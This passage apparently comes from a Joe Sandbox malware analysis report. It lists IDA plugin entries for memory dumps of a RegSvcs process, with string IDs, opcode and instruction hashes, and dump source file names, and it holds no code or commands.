                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 05aaadd8ecc181335ca72ce2d70269be415c798ead4ebe1efa346205886da47c
                                                                  • Instruction ID: 22771f7e969a159fda52415f53afdd999f520f21be5b7f01772da7fcfaf6ccbc
                                                                  • Opcode Fuzzy Hash: 05aaadd8ecc181335ca72ce2d70269be415c798ead4ebe1efa346205886da47c
                                                                  • Instruction Fuzzy Hash: 27F15E31B41208CFDB99EFA9D554A6EBBB6FF84300F21C529D8059B369DB359C42CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 0b1fc5e7169c6ba6e7ab0f93493a4e59efb982ad652730ebcc73ce4115dcd808
                                                                  • Instruction ID: 0576023d52788cdf2f625c766b7b75a2954f6850a2fc0ff8a3b45022f884675e
                                                                  • Opcode Fuzzy Hash: 0b1fc5e7169c6ba6e7ab0f93493a4e59efb982ad652730ebcc73ce4115dcd808
                                                                  • Instruction Fuzzy Hash: B5B13931E412188FDB94EF68D5946AEBBB6FF84300F25C529D8059B399DB74DC82CB81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRjq$LRjq$$jq$$jq
                                                                  • API String ID: 0-2974078839
                                                                  • Opcode ID: 24857070365b345ef21a955c6070559262dd686f862c4dd9070c1abda4ba1da5
                                                                  • Instruction ID: efffaa9fc77fa8f2d638ad42fb2a7daab5d5d8e2115eb16b98cdeeb07893a33d
                                                                  • Opcode Fuzzy Hash: 24857070365b345ef21a955c6070559262dd686f862c4dd9070c1abda4ba1da5
                                                                  • Instruction Fuzzy Hash: 9351B031B402118FDB98EB28D950A6EBBF6FF84300F15C569E8159B3A9DB71EC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 3bf38f841cdb7d474a9476137cea757f134f92d2a61d89afff58e3e9f9835616
                                                                  • Instruction ID: fe346f67d06632043893b3107181f8bc9909ec28cb15a8bea0bde8e1a0ce4078
                                                                  • Opcode Fuzzy Hash: 3bf38f841cdb7d474a9476137cea757f134f92d2a61d89afff58e3e9f9835616
                                                                  • Instruction Fuzzy Hash: CC518E30F512048FCFA5EA68E58066EBBF6EB84310F128629EC06D7255EB35DC41CB50